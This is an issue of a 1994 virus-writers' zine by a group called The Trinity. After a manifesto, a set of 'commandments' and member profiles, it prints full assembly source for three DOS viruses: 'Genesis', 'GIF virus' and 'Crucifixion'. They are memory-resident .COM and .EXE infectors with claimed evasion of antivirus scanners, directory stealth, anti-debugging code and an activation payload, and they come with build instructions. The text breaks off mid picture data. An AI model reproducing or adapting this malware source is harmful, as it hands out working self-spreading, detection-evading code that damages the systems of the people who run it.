Revelation
Volume 1 Issue 1
April 1, 1994

Written by : The Trinity
Published by : Public Demand

Notice : this is a magazine for the people, by some of the people, namely, us. If you are an individual, you can read this magazine free of charge. However, for Corporations or other organizations in general, there is an exorbitant fee. If you choose to read this as part of an organization, you must pay the exorbitant fee, or we will be very angry with you. However, you may feel free to read it as a free-thinking individual and go without charges.

This magazine is the premiere publication of The Trinity, a non-profit organization with the intent of spreading Truth. The Truth we spread is not the same one you hear about every day (most people don't anyway). We intend to show people that viruses (more commonly called self-replicating code) do not have to be harmful, and that they can indeed be quite intriguing. Also, as underthemes, because we are free thinkers, we will include some freedom of information and current events or whatever we feel like.

- Noah

File Contents :

Revel_1.001...................If you don't know, we won't tell you.
Revel_1.002...................The Ten Commandments of The Trinity
Revel_1.003...................Introduction to The Trinity by Noah
Revel_1.004...................Genesis Virus, by Holy Spirit
Revel_1.005...................GIF Virus, by God
Revel_1.006...................Crucifixion Virus, by Jesus
Revel_1.007...................Stupid Batch Loader Virus, by Jesus + Moses
Trinity.ANS...................Trinity Ansi, by Moses
HaHa.GIF......................Picture for GIF virus
Trinity.COM...................VGA Loader for Trinity, by Holy Spirit

A Great Big "Hey! We're Finally Here! Whassup?" Goes Out To: Phalcon/Skism, TridenT, Mark Ludwig, Urnst Kouch, CRIS, WCIVR, AKA, ARCV, and all virus writers and researchers everywhere.


The Ten Commandments of The Trinity

1.) THOU SHALT WRITE THINE OWN CODE. There is no art in copying. Learn from others, but be original.

2.) THOU SHALT NOT WRITE DESTRUCTIVE CODE. Create Art, Not Weaponry.

3.) THOU SHALT NOT PROGRAM OVERWRITING VIRUSES. Virons suck. Write real code.

4.) THOU SHALT WRITE TIGHT CODE. Sloppy programming makes me PuKE. Programming is an art, treat it as such.

5.) THOU SHALT BE CREATIVE AT ALL TIMES. Writing useless code that looks like it was mass generated is boring and stupid. Either write something interesting, or don't write.

6.) THOU SHALT NOT RELEASE VIRUSES ON THE PUBLIC. What's the point? Code for the challenge and the skill, not to screw with ignorant users.

7.) THOU SHALT NOT DEAL WITH ARiSToTLe. Some things are just better left undone.

8.) THOU SHALT FIGHT FOR THINE RIGHTS. Freedom is important. Information is important. Fight to keep information, and yourself, free.

9.) THOU SHALT ENCOURAGE THE LEARNING OF THINE ART. Be free with information, and teach those that desire to learn.

10.) THOU SHALT CONTINUE EXPLORING AND LEARNING UNTIL THE END OF THINE TIME. If you aren't learning something, and you aren't doing something new, don't bother.


"In the beginning, God created the heavens and the earth."
Genesis 1:1

An Introduction to The Trinity
by Noah

Well, I guess it's always good to start at the beginning. In the beginning.... hmmmm. Where was the beginning of this whole mess? A telephone call. A Sunday night. An angry parent. My friend got a call from his roommate's mother yelling about what a bad influence he was on her son and how conceited he was and how my friend thought himself a math god. Well, this last quote slowly transformed into just "god". So since this guy's mother had to be right (not) my friend became God, as a fun in-joke.

Well, it came around that there were three people who wanted to start a virus writing group, and since one person was already "God" (in joke only, not as a handle) they decided on The Trinity as a label. Thus were born God, Jesus, and the Holy Spirit.

Not too long after, two people who were knowledgeable on how the computer underground worked, besides being friends of the original three, joined on. These two, keeping with the theme, became Moses and Noah.

About a week ago, we had our first group meeting. The three coders each had something in the works already, so we decided that a joint release along with an introduction to the members could be released in one magazine and give us a starting point, along with a common goal. Well, we decided on a deadline and, of course, we're all working on it the night before said deadline.

This tells you a little about the group, I might be able to pull off profiles of the members, but it _is_ 1:40 in the morning, so I'm only doing my best. Let's see :

God : I've known this guy for about 5 years, and I've seen him go all the way from pascal to cutting-edge assembly code. His first virus for the group was designed for my roommate, a guy with close to 200 megs of gifs on his hard drive. God is one of the coders for the group, and is well versed in assembly, C, and pascal, although he rarely goes for high-level stuff anymore. He is a Math major, enjoys Led Zeppelin, Pink Floyd (yes, he has a ticket to the concert), and has decided that having a generous girlfriend with a car is much better than having a car yourself.

Jesus : I don't know much about him, except he's a really good assembly programmer. He plays the Bass Guitar, has exceptionally long hair (thus the handle he chose), and is the only person I've seen recently pay for a pizza, eat a quarter, give half away, then throw away a quarter.

Holy Spirit : Due to this lengthy handle, he has chosen the truncated H_Spirit. H_Spirit is a very likable guy, even though he claims to hold 95% of the world in contempt. He just learned assembly 3 months ago, and already has a nice virus. Not bad. He is now proficient in C and assembly, and also has tickets to see Pink Floyd (don't you hate these people!).

Moses : The first of two non-programmers in the group. He does a lot of the graphics and music for the group. He was one of the people on the original InterChat, and plans to eventually learn assembly. Noah : I am the second of the non-programmers. I do whatever is left over that doesn't require any assembly knowledge, like writing introduction profiles. Eventually, I plan to learn assembly as well. ; Genesis v1.00 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; "As long as the earth endures, ; seedtime and harvest, ; cold and heat, ; summer and winter, ; day and night ; will never cease." ; -Genesis 8:22 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; Memory Resident .COM Infector ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Critical Error Handler ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Screen Routine After 4 Infections ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Interesting Techniques ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Unable To Be Scanned By Known Scanners ; (F-Prot, TBscan, Scan) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Written by Holy Spirit ; Årinity ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; Also: to run effectively, a stub of 4 bytes should be appended to the ; beginning of the virus. .model tiny .radix 16 .code org 100 start: call get_offset db 'F' get_offset: mov bp,sp mov bp,[bp] dec sp dec sp sub bp, offset get_offset-1 ; set offset of start Check_res: mov ax, 3565 ; Is Int 65 hooked? 
int 21 mov bx, es cmp bx, 0 jne in_memory Allocate_Memory: sub word ptr ds:[02], 40 ; lower top of mem by 1K mov ax,ds dec ax ;Get Segment of MCB mov ds,ax sub word ptr ds:[03],40 ;Subtract 1K from host's MCB xor ax,ax mov ds,ax ;Allocate 1K from Bios dec word ptr ds:[413] mov ax,word ptr ds:[413] ;Get memory in 1K mov cl,6 shl ax,cl ;change to segment ;AX now equals free segment ;of memory sub ax, 10 mov es,ax ;Set ES = Free Segment push cs ;And DS = Code Segment pop ds Copy_Virus: mov di,100 ;keep offset the same as COM lea si,[bp+start] mov cx,(_end-start+1)/2 MoveIntoMem: push [si] pop ax inc si inc si stosw loop MoveIntoMem set_interrupts: push es es ; set ds and dx to new segment pop dx ds xor ax, ax mov es, ax ; ES = 0 cli mov word ptr es:[65*4], offset Int_65 ; Set Int 65 mov word ptr es:[65*4+2], dx mov word ptr es:[1c*4], offset Int_1c ; Set Int 1C mov word ptr es:[1c*4+2], dx lea ax, Int_21 ; Set Int 21 xchg word ptr es:[21*4], ax xchg word ptr es:[21*4+2], dx mov ds:[IP_21], ax mov ds:[CS_21], dx push ax dx pop es:[69*4+2] pop es:[69*4] sti in_memory: mov di, 100 ; set DI to start of program lea si, [bp+storage_bytes+10] ; Set SI to offset of storage ; bytes plus one segment push cs cs pop es bx ; Set ES to Code Segment xor ax, ax ; Reset AX register dec bx mov ds, bx ; Set DS to one segment less ; than Code Segment mov ax, [si] ; Put back original four bytes mov word ptr [di+10], ax ; at beginning of program mov ax, [si+2] mov word ptr [di+2+10], ax inc bx mov ds, bx ; Reset DS back to CS xor bx, bx ; Reset all other registers xor cx, cx xor dx, dx jump_to db 0e9 progstart dw start-progstart-6 Int_21: inc ah cmp ax, 4c00 ; Is it a regular execute? je have_fun ; No? Exit. jmp go_int21 have_fun: push ax bx cx dx si di es ds cli xor ax, ax mov es, ax push es:[24*4] push es:[24*4+2] push cs ; capture critical error handler push offset int_24 ; for those unwanted "write pop es:[24*4] ; protected" disks... 
pop es:[24*4+2] sti mov ax, 3d02 ; open for read/write int 69 jc no_open ; did it open right? If not get out. xchg bx, ax ; BX = file handle mov ah, 3f ; Read first four bytes push cs pop ds lea dx, storage_bytes mov cx, 4 int 69 mov ax, word ptr storage_bytes ; If it's an EXE close add ah,al cmp ah,'M'+'Z' je close_it cmp byte ptr [storage_bytes+3], 0fe ; if already infected close je close_it inc cs:infected_four ; Keep track of number infected mov ax, 4202 ; Go to end of file xor cx, cx xor dx, dx int 69 not ax mov progstart, ax sub progstart, jump_to-start+2 not ax sub ax, 3 ; Calculate jump to virus mov word ptr jump_to_virus+1, ax ; Store jump in memory push cs:infected_four ; save current number of infections mov cs:infected_four, 0 ; set to zero for copying mov ah, 40 mov cx, _end-start mov dx, offset start int 69 ; append virus to program pop cs:infected_four ; reset back to original value mov ax, 4200 xor cx, cx xor dx, dx int 69 ; jump back to beginning of program mov ah, 40 mov cx, 4 mov dx, offset jump_to_virus int 69 ; write the jump to the virus close_it: mov ah, 3e ; close the file int 69 no_open: pop es:[24*4+2] pop es:[24*4] ; reset critical error handler pop ds es di si dx cx bx ax ; reset original registers go_int21: dec ah db 0ea ; call a real Int 21 IP_21 dw ? CS_21 dw ? 
int_24: mov al, 3 iret Int_65: ; fake interrupt to check for iret ; installation count2 db 1 ; variable to keep track of fading Int_1C: push ax cx dx ds si ; push registers cmp cs:infected_four, 4 ; only run if four files have been jb return2 ; infected since installation cmp cs:count2, 1 je C1 cmp cs:count2, 2 je C2 cmp cs:count2, 3 je C3 mov dl, 7 mov cs:count2, 1 jmp setup C1: mov dl, 8 mov cs:count2, 2 jmp setup C2: mov dl, 0 mov cs:count2, 3 jmp setup C3: mov dl, 8 mov cs:count2, 4 setup: mov ax, 0b800 mov ds, ax mov cx, 2000d mov si, 1 loop_: mov byte ptr [ds:si], dl add si, 2 loop loop_ return2: pop si ds dx cx ax iret infected_four dw 0 storage_bytes db 0cdh, 20, 90, 0fe jump_to_virus db 0e9, 00, 00, 0fe _end: end start ; "But I say to you that whoever looks at a woman to lust for her ; has already committed adultery with her in his heart." ; - The Gospel of Matthew 5:27 ; ; "And God said, 'Let there be a GIF virus'..." ; ; The Trinity Proudly Presents ; The GIF Virus ; (No, it doesn't infect GIF files...) ; Brought into Existence By ; God ; ; This one is for all of the giffy boys and girls out there... ; ; "If your right eye causes you to sin, pluck it out and cast it ; from you; for it is more profitable for you that one of your ; members perish, than for your whole body to be cast into hell." ; - Matthew 5:28 ; ; Features ; ÍÍÍÍÍÍÍÍÍÍ ; Memory Resident Companion .EXE and .COM infector ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Manages a Companion Companion File (The GIF) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Infects on Execution and Drive Changes ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Some Directory Stealth Routines for ; the Companion Files and the GIF file ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; A cool GIF will definitely turn your stomach ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ; *NOTE*: To initiate this virus, you must copy HAHA.GIF to the ; root directory. 
; ; "And if your right hand causes you to sin, cut it off and cast ; it from you; for it is more profitable for you that one of your ; members perish, than for your whole body to be cast into hell." ; - Matthew 5:29 ; ; "... And God saw that it was good." .286 ; If you don't have a 286... .model tiny ; ... nevermind. .radix 16 .code org 100h main: Allocate_Mem: push ds mov ax,ds dec ax mov ds,ax mov byte ptr ds:[0],'Z' sub word ptr ds:[03],120 sub word ptr ds:[12],120 xor ax,ax mov ds,ax sub word ptr ds:[413],3 mov ax,word ptr ds:[413] mov cl,6 shl ax,cl sub ax,10 mov es,ax Copy_Virus: mov di,100h lea si,main pop ds mov cx,(_end-main+1)/2 repnz movsw Set_Interrupts: push es es pop dx ds xor ax,ax mov es,ax cli lea ax,Int_21 xchg word ptr es:[21*4],ax ; Redirect Int 21 xchg word ptr es:[21*4+2],dx mov [IP_21],ax ; Save old Int 21 mov [CS_21],dx mov word ptr es:[65*4],ax ; Redirect Int 65 to mov word ptr es:[65*4+2],dx ; old Int 21 sti Exec_Command: push cs pop ds push word ptr ds:[2c] ; Get segment for environment pop ds xor si,si Goto_Command: lodsw ; Skip junk at beginning of cmp ax,0 ; environment. je Got_Command ; There is a 0000h right before dec si ; the command line. jmp Goto_Command Got_Command: lodsw push cs pop es lea di,filename Get_Name: stosb ; Copy command line. lodsb cmp al,'.' jne Get_Name push cs pop ds mov si,81 Get_Param: ; Copy parameters lodsb stosb cmp al,0dh jne Get_Param mov cx,di lea si,filename sub cx,si mov byte ptr es:[si],cl mov ah,4a mov bx,(_end-main+10)/10 int 21 int 2e ; Execute. mov ax,4c00 int 21 open_file: inc cs:counter cmp cs:counter,7 ; Shows GIF on every 7th jl go_int21 ; open. mov cs:counter,0 push si xor si,si xchg bx,dx next_byte: cmp byte ptr [bx+si],'G' ; Is it a GIF? 
je found cmp byte ptr [bx+si],'g' je found cmp byte ptr [bx+si],0 je not_gif inc si jmp next_byte found: inc si cmp [bx+si],4649 je open_my_file cmp [bx+si],6669 jne next_byte open_my_file: ; If so, open my GIF :) xchg bx, dx push ds push cs pop ds push dx lea dx,the_file inc cs:in_prog int 21 dec cs:in_prog pop dx ds si iret not_gif: xchg bx,dx pop si jmp go_int21 go_int21: db 0ea IP_21 dw ? CS_21 dw ? dc: jmp driv_chng of: jmp open_file found_file: pop ds es popf popa retf 02 error_find: mov ax,12h retf 02 find_file: int 65 jc error_find pusha pushf push es ds mov ah,2f int 65 cmp word ptr es:[bx+1a],offset end_prog-100 je find_next not_virus: push cs pop ds mov si,offset the_file+1 add bx,1e mov di,bx mov cx,4 rep cmpsb or cx,cx jz find_next find_ext: inc bx cmp byte ptr es:[bx],'.' jne find_ext cmp word ptr es:[bx+2],'ZX' jne not_EXZ1 mov byte ptr es:[bx+3],'E' jmp found_file not_EXZ1: cmp word ptr es:[bx+2],'ZO' jne found_file mov byte ptr es:[bx+3],'M' jmp found_file find_next: pop ds es popf popa mov ah,4fh jmp find_file Int_21: cmp cs:[in_prog],00h ; Is stealth on? 
jne go_int21 cmp ah,0eh je dc cmp ah,3dh je of cmp ax,4b00 je execute cmp ah,11 je find_fcb cmp ah,12 je find_fcb cmp ah,4eh je find_file cmp ah,4f je find_file jmp go_int21 find_fcb: int 65 cmp al,0ff je no_matching_fcb check_file: pusha push es ds mov ah,2f int 65 cmp byte ptr es:[bx],0ff jne not_extended add bx,8 not_extended: cmp word ptr es:[bx+1c],offset end_prog-100 je find_next_fcb push cs pop ds mov si,offset the_file+1 mov di,bx mov cx,4 rep cmpsb or cl,cl jz find_next_fcb cmp word ptr es:[bx+9],'ZX' jne not_EXZ2 mov byte ptr es:[bx+0A],'E' jmp found_file_fcb not_EXZ2: cmp word ptr es:[bx+9],'ZO' jne found_file_fcb mov byte ptr es:[bx+0A],'M' jmp found_file_fcb find_next_fcb: pop ds es popa mov ah,12 jmp find_fcb found_file_fcb: pop ds es popa no_matching_fcb: iret execute: push si es di ax cx ds bx dx push cs pop es mov si,dx lea di,filename push di copy_str: lodsb stosb or al,al jnz copy_str mov byte ptr es:[di-2],'Z' ; Infection Routine mov ah,56 ; Rename pop di int 65 jc already_there mov ah,3c ; Copy Virus mov cl,0010b int 65 push cs pop ds xchg bx,ax mov ah,40 mov cx,offset end_prog-100 mov dx,100 int 65 mov ah,3e int 65 already_there: pop dx bx ds cx ax di es mov byte ptr ds:[si-2],'Z' pop si jmp go_int21 driv_chng: ; Copies the GIF companion on push ds ; drive changes. 
push es pusha inc cs:in_prog ; check to see if same drive mov ah,19 int 21 cmp al,dl je pop_a push cs ; open the file to copy pop ds mov ax,3d00 push dx lea dx,the_file int 21 pop dx jc pop_a mov di,ax mov ah,0e int 21 mov ah,4e mov cx,00100011b lea dx,the_file add dx,2 int 21 jnc close_2nd mov ah,3c mov cx,00100011b lea dx,the_file int 21 xchg di,ax lea dx,_end mov bx,ax read_write: mov ah,3f mov cx,800 int 21 xchg bx,di mov cx,ax mov ah,40 int 21 xchg bx,di cmp ax,800 jnb read_write xchg bx,di mov ah,3e int 21 close_2nd: mov bx,di mov ah,3e int 21 pop_a: popa pop es pop ds dec cs:in_prog jmp go_int21 the_file db '\HAHA.GIF',0 ; Name of our .GIF counter db 0 ; To keep track of number of files viewed in_prog db 0 end_prog: filename db 50 dup(?) _end: end main ;ÉÍÍÄÄÄÄ ÄÄÄÄÍÍ» ;º (rucifixion Virus 1.0 º ;³ "If You're The Messiah And Ya Know It" ³ ;³ Created by ³ ; Jesus of The Trinity ; Ü Ü ; ßÛß ßÛß ; Û Û ; "Let the Christ, the King of Israel, ; Descend now from the cross, ; That we may see and believe" ; - Mark 15:32 ; ; Features ; ÍÍÍÍÍÍÍÍÍÍ ; Memory resident appending .COM infector ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Not detected by F-Prot/TBAV with heuristics ; (sets off NO flags) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Infects .COM files when they are copied ; or scanned by some programs (F-Prot) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Anti-debugging/disassembling code included ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; File attributes, time, and date remain intact ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Int 24h critical error handling enabled ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; And of course, one hell of a cool activation routine! ;³ Activates on Sundays during March and April of any year ³ ;³ when the system is rebooted using CTRL-ALT-DEL. ³ ;º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º ;ÈÍÍÄÄÄÄ ÄÄÄÄÍͼ ;This virus needs a four byte stub file for its first generation. 
;Simply make a file of 4 nops in debug and save it, then merge the two ;files with somethin' like "copy /b stub.com+cruc.com crucifix.com". .model tiny .radix 16 .code org 100 Crucifixion: call Displacement DitchDebuggers: ;And heuristics.... push di mov di,si add di,(Trap1-crucifixion-3) mov ah,0cdh xchg [di],ah ;Cause some heuristics and debuggers to Trap1: ;terminate right here..... mov bx,2090 ;<---- xchg [di],ah pop di jmp short RestoreComHost Trap2 db 9a RestoreComHost: add si,(Storagebytes-crucifixion-3) jmp short Trap3 db 0b8 Trap3: movsw movsw SetupAllocation: push ds pop ax dec ax dec ax mov ds,ax inc ax CheckIfInstalled: cmp byte ptr ds:[10],'Z' ;Will not go memory res. if it is not jne ExitCrucifixion ;in the last block of memory. ModCurrentMCB: sub word ptr ds:[13],(endcruc-Crucifixion)/10+3 add ax,word ptr ds:[13] mov byte ptr ds:[10],'M' inc ax mov es,ax inc ax CreateNewMCB: mov word ptr es:[8],'eJ' mov word ptr es:[1],ax mov word ptr es:[0a],'uS' mov byte ptr es:[0],'Z' mov word ptr es:[0c],'S' mov word ptr es:[3],(endcruc-Crucifixion)/10+1 CopyVirus: sub ax,10 mov es,ax mov di,100 sub si,(EndStorage-Crucifixion)-20 mov cx,EndCruc-Crucifixion repnz movsb HookInts: xor ax,ax mov ds,ax cli mov ax,offset Int21h xchg word ptr ds:[84],ax mov word ptr es:[Old21],ax mov ax,es ;Int 21h xchg word ptr ds:[86],ax mov word ptr es:[Old21+2],ax mov ax,offset Int09 xchg word ptr ds:[9*4],ax mov word ptr es:[Old09],ax ;Int 09h mov ax,es xchg word ptr ds:[9*4+2],ax mov word ptr es:[Old09+2],ax sti ExitCrucifixion: push cs cs pop es ds xor ax,ax mov bx,ax mov cx,ax mov dx,ax mov di,ax mov si,100 ret Displacement: mov di,sp mov si,[di] sub sp,2 mov [di-2],si mov word ptr [di],100 mov di,[di] ret StorageBytes db 0cdh,20,90,90 EndStorage: Jmpbytes db 0e9,0,0,'Å' ;The cross is out ID byte ;) db 0ea Int21h: cmp ah,6c ;This one is used by copy and similar progs. 
je DosOpenFile ExitInt21h: db 0ea Old21 dd 0 db 0b8 DosOpenFile: push ax bx cx es dx di ds si call Set24 ;Set Error Handler mov dx,si FindStringEnd: lodsb or al,al jnz FindStringEnd cmp word ptr [si-4],'OC' jne DontInfect cmp word ptr [si-2],'M' je InfectFile DontInfect: jmp ExitFile InfectFile: mov ax,43 call call21 ;Get old attributes mov cs:[attribs],cx xor cx,cx mov ax,143 ;set 'em to zero call call21 mov ax,023dh call call21 push cs pop ds jc ExitFile ;open file read/write xchg bx,ax mov ax,57 call call21 mov word ptr [TimeDate],cx ;save time/date mov word ptr [TimeDate+2],dx mov dx,offset StorageBytes mov al,3f ;read in beginning of prog mov cx,4 call call21 cmp byte ptr [Storagebytes+3],'Å' je CloseFile ;Check if already infected mov ax,word ptr [Storagebytes] xor ah,al ;Check if .EXE file cmp ah,17 je CloseFile mov ax,0242 call MoveFP ;go to the end of file cmp ax,0ff00h-(endCruc-Crucifixion) ;Make sure size is small enough jae CloseFile ;that we don't push it > 64k add ax,-3 mov word ptr [jmpbytes+1],ax ;calculate jump size mov cx,endCruc-Crucifixion mov dx,100 mov al,40 ;append virus call call21 mov ax,42 ;go to beginning of program call MoveFP mov al,40 mov dx,offset jmpbytes mov cx,4 ;write in jump and ID call call21 CloseFile: mov word ptr cx,[TimeDate] mov word ptr dx,[TimeDate+2] mov ax,157 ;restore time/date call call21 mov al,3e call call21 ;close it pop dx ds push ds dx mov ax,143 mov cx,word ptr cs:[Attribs] ;restore attribs call call21 ExitFile: call Reset24 ;Restore Error Handler pop si ds di dx es cx bx ax jmp ExitInt21h MoveFP: xor cx,cx xor dx,dx call call21 ret Call21: xchg ah,al pushf call dword ptr cs:[Old21] ret db 0b1 Set24: push ds ax xor ax,ax mov ds,ax mov ax,offset Int24 xchg ax,word ptr ds:[24*4] mov word ptr cs:[Old24],ax ;set up critical error handler mov ax,cs xchg ax,word ptr ds:[24*4+2] mov word ptr cs:[Old24+2],ax pop ax ds ret db 0e9 Reset24: push ds ax xor ax,ax mov ds,ax mov ax,word ptr cs:[Old24] mov word ptr ds:[24*4],ax 
;restore old critical error handler mov ax,word ptr cs:[Old24+2] mov word ptr ds:[24*4+2],ax pop ax ds ret Int24: mov al,3 ;return a "Fail" on errors iret Old24 dd 0 db 0ea Int09: push ax in al,60 cmp al,53 ;Is DEL, lets check for Control-Alt je IsDEL NotAReboot: pop ax GoInt09: db 0ea Old09 dd 0 IsDEL: push ds sub ax,ax mov ds,ax mov al,byte ptr ds:[417] pop ds and al,1100b cmp al,0c jne NotAReboot IsDefinitelyReboot: mov al,2a call call21 ;Get Date or al,al jnz RebootComp ;Is it sunday? cmp dh,3 jb RebootComp ;Is it in march? cmp dh,4 ja RebootComp ;or april? call CrucifixionActivation RebootComp: db 0ea,0,0,0ff,0ff ;cold reboot Old_SS dw 0 Old_SP dw 0 CrucifixionActivation: mov ax,sp mov cs:[Old_sp],ax mov ax,ss mov cs:[Old_SS],ax cli mov ax,cs mov ss,ax mov sp,offset EndCruc sti SetScreen: mov ax,13 int 10 push cs cs pop es ds SetColors: mov ax,1012 xor bx,bx mov cx,08 mov dx,offset ColorData int 10 DoTitle: mov dx,09 call setcurs mov si,offset Vname call WriteIt mov dx,0103 call setcurs mov si,offset credits call writeit SetupPic: push cs pop ds mov si,offset StartCross mov di,0a000 mov es,di mov di,3640 call DrawIt GetKey: call DoMusic DoneGraphics: mov ax,3 int 10 call Speaker_On mov cx,100 FallingSound: mov ax,cx call Out_Sound call delay add cx,200 cmp cx,1a00 jb FallingSound call Turn_Off_Speaker RestoreStack: cli mov ax,word ptr cs:[Old_SS] mov ss,ax mov ax,word ptr cs:[Old_SP] mov sp,ax sti ret DrawIT: mov bp,di DrawLoop: lodsb cmp al,0ff je Line cmp al,0 je Eol stosb jmp DrawLoop Line: lodsb ;get color xchg cx,ax ;save in cl xor ah,ah ;zero ah lodsb ;get line length xchg cx,ax ;put color in al and length into cx repnz stosb jmp DrawLoop Eol: cmp byte ptr [si],0 je DoneDraw mov di,bp add di,320d jmp Drawit DoneDraw: ret WriteIt: lodsb or al,al jz DoneWrite mov bx,4 mov ah,0e int 10 jmp WriteIt DoneWrite: ret setcurs: mov ah,02 mov bh,0 ;Set cursor int 10 ret IfYourThe: push si mov si,offset Lyrics1 DoLyric: mov dx,1001 call setcurs call WriteIt pop si 
jmp PlayMusic ClapYour: push si mov si,offset Lyrics2 jmp DoLyric YourFace: push si mov si,offset Lyrics3 jmp DoLyric DoMusic: push cs pop ds mov si,offset MusicData PlayMusic: lodsw cmp ax,0 je DoneMusic cmp ax,1 je TurnItOn cmp ax,2 je TurnItOff cmp ax,-1 je WaitSome cmp ax,-2 je Scree cmp ax,3 je IfYourThe cmp ax,4 je CLapYour cmp ax,5 je YourFace cmp ax,6 je TheClap call Out_Sound jmp PlayMusic DoneMusic: ret TurnItOn: call Speaker_On jmp PlayMusic TurnItOff: call Turn_Off_Speaker jmp PlayMusic WaitSome: mov cx,3 WaitMore: call delay loop WaitMore jmp PlayMusic TheClap: push es ds si di mov si,offset Arms3 je DoArms3 Scree: push es ds si di DoArms2: mov si,offset Arms2 DoArms3: mov di,0a000 mov es,di mov di,3640+320d*10d call DrawIt call Speaker_On mov cx,400 cmp si,offset Arms3 ja MakeScreech mov cx,8000 MakeScreech: mov ax,cx call Out_Sound call delay sub cx,3f cmp si,offset Arms3 ja LowCheck cmp cx,7f00 ja MakeScreech call Turn_Off_Speaker jmp short DoArms1 LowCheck: cmp cx,300 ja MakeScreech call Turn_Off_Speaker DoArms1: mov si,offset Arms1 mov di,0a000 mov es,di mov di,3640+320d*10d call DrawIt pop di si ds es jmp PlayMusic delay: push ax ds xor ax,ax mov ds,ax mov ax,word ptr ds:[46c] waiter: cmp ax,word ptr ds:[46c] je waiter pop ds ax ret Turn_Off_Speaker: in al,61h and al,0FCh out 61h,al ret Speaker_On: in al,61h or al,3 out 61h,al ;Turn on speaker mov al,0B6h out 43h,al ret Out_Sound: out 42h,al mov al,ah out 42h,al ret ColorData: db 0,0,0,32,1f,13,1bh,12,9,12,0e,6,19,0,0,2a,1a,10,0,13,0,0,0,18 ;Picture Data ; 0ff marks line, 0 marks eol ; ; Line Format: ; 0ffh, color, length ; ;double 0 marks eof StartCross: db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,3,3,3,0ff,2,5,3,3,0 db 0ff,0,18d,3,3,6,0ff,2,5,6,3,0 db 0ff,0,18d,3,3,2,6,2,6,2,6,2,3,0 db 0ff,0,18d,3,3,2,1,7,1,7,1,2,3,0 db 0ff,0,18d,3,3,2,0ff,1,5,2,3,0 db 0ff,0,18d,3,3,2,1,5,5,5,1,2,3,0 db 0ff,0,18d,3,3,2,2,1,1,1,2,2,3,0 db 0ff,3,20d,2,2,1,1,1,2,2,0ff,3,18d,0 db 
